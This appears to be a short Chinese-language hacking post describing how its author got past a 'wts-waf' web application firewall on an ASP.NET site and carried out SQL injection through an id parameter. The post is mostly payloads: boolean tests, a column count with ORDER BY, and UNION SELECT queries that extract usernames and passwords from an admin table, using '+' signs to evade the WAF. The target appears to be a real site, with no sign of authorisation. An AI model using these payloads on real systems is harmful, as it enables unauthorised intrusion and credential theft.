今天遇到个站有点意思,环境asp.net,waf是wts—waf,有个链接存在sql注入
过waf注入的整个过程非常顺利,以下是过程
?id=6532+and+1=1 //用+号是为了绕过waf
?id=6532+and+1=2
网页出现异常说明存在注入。
然后ORDER BY 25 查询字段,超过25出现异常说明字段数为25
+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+admin
使用联合查询猜表名,从网页返回的结果来是在第7个字段
猜解字段名
+union+select+1,2,3,4,5,6,username,password,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+admin
爆出信息